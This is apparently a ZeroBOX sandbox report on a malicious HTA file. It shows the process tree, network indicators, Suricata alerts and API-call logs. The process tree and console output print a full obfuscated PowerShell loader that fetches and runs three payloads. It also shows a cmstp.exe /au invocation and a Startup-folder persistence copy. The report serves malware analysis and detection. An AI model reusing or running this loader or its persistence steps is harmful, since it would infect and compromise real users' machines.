Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 8, 2024, 6:25 p.m.	July 8, 2024, 6:27 p.m.

Size	23.9KB
Type	HTML document, ASCII text, with very long lines
MD5	`e17e0242e9fe3834c192513619013b92`
SHA256	`62bfae52ac823dc16c7e4316bf9fe6be65f6d0c0870eb6f48c0a747b61a73d1a`
CRC32	`F6B25F7F`
ssdeep	`384:fhK/Ky0DzcxWuZtl231qOglPj1XepcO5O4l8vFmRitl9d:1Eb5sUOcPj4cOMW8Witl9d`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\venture45.hta
2560
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function kTAPX($whVhTP, $wgoNDQ){[IO.File]::WriteAllBytes($whVhTP, $wgoNDQ)};function sJkqoCLtF($whVhTP){if($whVhTP.EndsWith((iRVrfw @(37574,37628,37636,37636))) -eq $True){Start-Process (iRVrfw @(37642,37645,37638,37628,37636,37636,37579,37578,37574,37629,37648,37629)) $whVhTP}else{Start-Process $whVhTP}};function LFuvhloI($IjWpK){$BBYenLHq = New-Object (iRVrfw @(37606,37629,37644,37574,37615,37629,37626,37595,37636,37633,37629,37638,37644));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$wgoNDQ = $BBYenLHq.DownloadData($IjWpK);return $wgoNDQ};function iRVrfw($cPcmspjt){$VFROSVY=37528;$uuolpFGi=$Null;foreach($GDbxHrfK in $cPcmspjt){$uuolpFGi+=[char]($GDbxHrfK-$VFROSVY)};return $uuolpFGi};function iHiOJeOT(){$SrcVb = $env:APPDATA + '\';$xhXqj = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37577,37579,37579,37583,37648,37574,37644,37648,37644));$UmbJSaI = $SrcVb + '1337x.txt';kTAPX $UmbJSaI $xhXqj;sJkqoCLtF $UmbJSaI;;$ywjaqdxl = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37648,37640,37636,37625,37649,37628,37574,37632,37644,37625));$PIZfdML = $SrcVb + 'xplayd.hta';kTAPX $PIZfdML $ywjaqdxl;sJkqoCLtF $PIZfdML;;$OAXyl = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639,37645,37627,37632,37629,37642,37573,37576,37577,37573,37643,37644,37625,37644,37633,37627,37574,37627,37639,37637,37575,37635,37646,37642,37639,37575,37597,37642,37636,37638,37626,37574,37629,37648,37629));$DSRYp = $SrcVb + 'Erlnb.exe';kTAPX $DSRYp $OAXyl;sJkqoCLtF $DSRYp;;}iHiOJeOT;
  2648
  - notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\test22\AppData\Roaming\1337x.txt
    2844
  - mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\test22\AppData\Roaming\xplayd.hta"
    2924
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -File C:\Users\Public\RoLg.ps1
      3004
      - cmstp.exe "cmstp.exe" C:\Users\Public\user.inf /au
        152
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\jdaqmeqs.cmdline"
        2228
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES13B3.tmp" "c:\Users\test22\AppData\Local\Temp\CSC13A2.tmp"
        2212
  - Erlnb.exe "C:\Users\test22\AppData\Roaming\Erlnb.exe"
    604
    - Powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\test22\AppData\Roaming\Erlnb.exe' 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Erlnb.exe' -Force
      2544
    - Erlnb.exe "C:\Users\test22\AppData\Roaming\Erlnb.exe"
      2760

Name	Response	Post-Analysis Lookup
voucher-01-static.com	A 91.92.243.32	91.92.243.32

IP Address	Status	Action
164.124.101.2	Active	Moloch
91.92.243.32	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 91.92.243.32:80 -> 192.168.56.101:49163	2400012	ET DROP Spamhaus DROP Listed Traffic Inbound group 13	Misc Attack
TCP 192.168.56.101:49163 -> 91.92.243.32:80	2022520	ET POLICY Possible HTA Application Download	Potentially Bad Traffic
TCP 91.92.243.32:80 -> 192.168.56.101:49163	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 91.92.243.32:80 -> 192.168.56.101:49163	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (20 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2024, 6:25 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (7 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 8, 2024, 6:25 p.m.			0	0
IsDebuggerPresent July 8, 2024, 6:25 p.m.			0	0
IsDebuggerPresent July 8, 2024, 6:25 p.m.			0	0
IsDebuggerPresent July 8, 2024, 6:25 p.m.			0	0
IsDebuggerPresent July 8, 2024, 6:25 p.m.			0	0
IsDebuggerPresent July 8, 2024, 6:25 p.m.			0	0
IsDebuggerPresent July 8, 2024, 6:25 p.m.			0	0

Command line console output was observed (50 out of 76 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: At line:1 char:475 console_handle: 0x00000053	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: + function kTAPX($whVhTP, $wgoNDQ){[IO.File]::WriteAllBytes($whVhTP, $wgoNDQ)}; console_handle: 0x0000005f	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: function sJkqoCLtF($whVhTP){if($whVhTP.EndsWith((iRVrfw @(37574,37628,37636,376 console_handle: 0x0000006b	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: 36))) -eq $True){Start-Process (iRVrfw @(37642,37645,37638,37628,37636,37636,37 console_handle: 0x00000077	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: 579,37578,37574,37629,37648,37629)) $whVhTP}else{Start-Process $whVhTP}};functi console_handle: 0x00000083	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: on LFuvhloI($IjWpK){$BBYenLHq = New-Object (iRVrfw @(37606,37629,37644,37574,37 console_handle: 0x0000008f	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: 615,37629,37626,37595,37636,37633,37629,37638,37644));[Net.ServicePointManager] console_handle: 0x0000009b	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: :: <<<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$wgoNDQ = $BBYenLH console_handle: 0x000000a7	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: q.DownloadData($IjWpK);return $wgoNDQ};function iRVrfw($cPcmspjt){$VFROSVY=3752 console_handle: 0x000000b3	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: 8;$uuolpFGi=$Null;foreach($GDbxHrfK in $cPcmspjt){$uuolpFGi+=[char]($GDbxHrfK-$ console_handle: 0x000000bf	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: VFROSVY)};return $uuolpFGi};function iHiOJeOT(){$SrcVb = $env:APPDATA + '\';$xh console_handle: 0x000000cb	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: Xqj = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639, console_handle: 0x000000d7	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: 579,37579,37583,37648,37574,37644,37648,37644));$UmbJSaI = $SrcVb + '1337x.txt' console_handle: 0x000000fb	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: ;kTAPX $UmbJSaI $xhXqj;sJkqoCLtF $UmbJSaI;;$ywjaqdxl = LFuvhloI (iRVrfw @(37632 console_handle: 0x00000107	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: 574,37632,37644,37625));$PIZfdML = $SrcVb + 'xplayd.hta';kTAPX $PIZfdML $ywjaqd console_handle: 0x00000137	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: xl;sJkqoCLtF $PIZfdML;;$OAXyl = LFuvhloI (iRVrfw @(37632,37644,37644,37640,3758 console_handle: 0x00000143	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: 37642,37639,37575,37597,37642,37636,37638,37626,37574,37629,37648,37629));$DSRY console_handle: 0x00000167	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: p = $SrcVb + 'Erlnb.exe';kTAPX $DSRYp $OAXyl;sJkqoCLtF $DSRYp;;}iHiOJeOT; console_handle: 0x00000173	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x0000017f	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x0000018b	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: At line:1 char:475 console_handle: 0x00000053	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: + function kTAPX($whVhTP, $wgoNDQ){[IO.File]::WriteAllBytes($whVhTP, $wgoNDQ)}; console_handle: 0x0000005f	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: function sJkqoCLtF($whVhTP){if($whVhTP.EndsWith((iRVrfw @(37574,37628,37636,376 console_handle: 0x0000006b	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: 36))) -eq $True){Start-Process (iRVrfw @(37642,37645,37638,37628,37636,37636,37 console_handle: 0x00000077	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: 579,37578,37574,37629,37648,37629)) $whVhTP}else{Start-Process $whVhTP}};functi console_handle: 0x00000083	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: on LFuvhloI($IjWpK){$BBYenLHq = New-Object (iRVrfw @(37606,37629,37644,37574,37 console_handle: 0x0000008f	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: 615,37629,37626,37595,37636,37633,37629,37638,37644));[Net.ServicePointManager] console_handle: 0x0000009b	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: :: <<<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$wgoNDQ = $BBYenLH console_handle: 0x000000a7	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: q.DownloadData($IjWpK);return $wgoNDQ};function iRVrfw($cPcmspjt){$VFROSVY=3752 console_handle: 0x000000b3	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: 8;$uuolpFGi=$Null;foreach($GDbxHrfK in $cPcmspjt){$uuolpFGi+=[char]($GDbxHrfK-$ console_handle: 0x000000bf	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: VFROSVY)};return $uuolpFGi};function iHiOJeOT(){$SrcVb = $env:APPDATA + '\';$xh console_handle: 0x000000cb	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: Xqj = LFuvhloI (iRVrfw @(37632,37644,37644,37640,37586,37575,37575,37646,37639, console_handle: 0x000000d7	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: 579,37579,37583,37648,37574,37644,37648,37644));$UmbJSaI = $SrcVb + '1337x.txt' console_handle: 0x000000fb	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: ;kTAPX $UmbJSaI $xhXqj;sJkqoCLtF $UmbJSaI;;$ywjaqdxl = LFuvhloI (iRVrfw @(37632 console_handle: 0x00000107	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: 574,37632,37644,37625));$PIZfdML = $SrcVb + 'xplayd.hta';kTAPX $PIZfdML $ywjaqd console_handle: 0x00000137	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: xl;sJkqoCLtF $PIZfdML;;$OAXyl = LFuvhloI (iRVrfw @(37632,37644,37644,37640,3758 console_handle: 0x00000143	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: 37642,37639,37575,37597,37642,37636,37638,37626,37574,37629,37648,37629));$DSRY console_handle: 0x00000167	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: p = $SrcVb + 'Erlnb.exe';kTAPX $DSRYp $OAXyl;sJkqoCLtF $DSRYp;;}iHiOJeOT; console_handle: 0x00000173	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x0000017f	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x0000018b	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x000001ab	1	1
WriteConsoleW July 8, 2024, 6:25 p.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x000001b7	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 175 events)

Time & API	Arguments	Status	Return
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656598 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656d18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656d18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656d18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656d18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656d18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656d18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656dd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656dd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656dd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656dd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656dd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656dd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656dd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00656dd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a4650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a5410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a5410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2024, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006a5410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 8, 2024, 6:25 p.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ July 8, 2024, 6:25 p.m.	stacktrace: system+0x9139e1 @ 0x6acc39e1 system+0x9138de @ 0x6acc38de system+0x1318d0 @ 0x6eca18d0 system+0x13136d @ 0x6eca136d system+0x131277 @ 0x6eca1277 system+0x130fda @ 0x6eca0fda system+0x130f91 @ 0x6eca0f91 system+0x130a6f @ 0x6eca0a6f system+0x13091e @ 0x6eca091e system+0x1a3237 @ 0x6ed13237 system+0x19a884 @ 0x6ed0a884 system+0x19a79e @ 0x6ed0a79e system+0x19a6b1 @ 0x6ed0a6b1 system+0x19a4bf @ 0x6ed0a4bf system+0x198a79 @ 0x6ed08a79 system+0x19861c @ 0x6ed0861c system+0x18d1fe @ 0x6ecfd1fe system+0x193c2f @ 0x6ed03c2f system+0x19ac03 @ 0x6ed0ac03 system+0x19a884 @ 0x6ed0a884 system+0x19a79e @ 0x6ed0a79e system+0x19a6b1 @ 0x6ed0a6b1 system+0x19a4bf @ 0x6ed0a4bf system+0x198a79 @ 0x6ed08a79 system+0x19861c @ 0x6ed0861c system+0x18d1fe @ 0x6ecfd1fe system+0x193c2f @ 0x6ed03c2f system+0x193b12 @ 0x6ed03b12 system+0x18fe09 @ 0x6ecffe09 system+0x18f8c7 @ 0x6ecff8c7 mscorlib+0x216e76 @ 0x71056e76 mscorlib+0x2202ff @ 0x710602ff mscorlib+0x216df4 @ 0x71056df4 CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x71941b4c CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x71958dde CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x71966a2c CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x71966a5f CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x71966a7d DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x719e3191 CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x7199192f CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x719918cb CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x719917f1 CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x7199197d DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x719e2f62 DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x719e303c GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x71aa805a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 e8 f4 44 86 ff 85 c0 74 21 c7 45 d4 02 00 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: system+0x911edd exception.address: 0x6acc1edd registers.esp: 102625660 registers.edi: 0 registers.eax: 62882692 registers.ebp: 102625712 registers.edx: 49062080 registers.ebx: 47267460 registers.esi: 65383724 registers.ecx: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

July 8, 2024, 6:25 p.m.

stacktrace:

system+0x9139e1 @ 0x6acc39e1
system+0x9138de @ 0x6acc38de
system+0x1318d0 @ 0x6eca18d0
system+0x13136d @ 0x6eca136d
system+0x131277 @ 0x6eca1277
system+0x130fda @ 0x6eca0fda
system+0x130f91 @ 0x6eca0f91
system+0x130a6f @ 0x6eca0a6f
system+0x13091e @ 0x6eca091e
system+0x1a3237 @ 0x6ed13237
system+0x19a884 @ 0x6ed0a884
system+0x19a79e @ 0x6ed0a79e
system+0x19a6b1 @ 0x6ed0a6b1
system+0x19a4bf @ 0x6ed0a4bf
system+0x198a79 @ 0x6ed08a79
system+0x19861c @ 0x6ed0861c
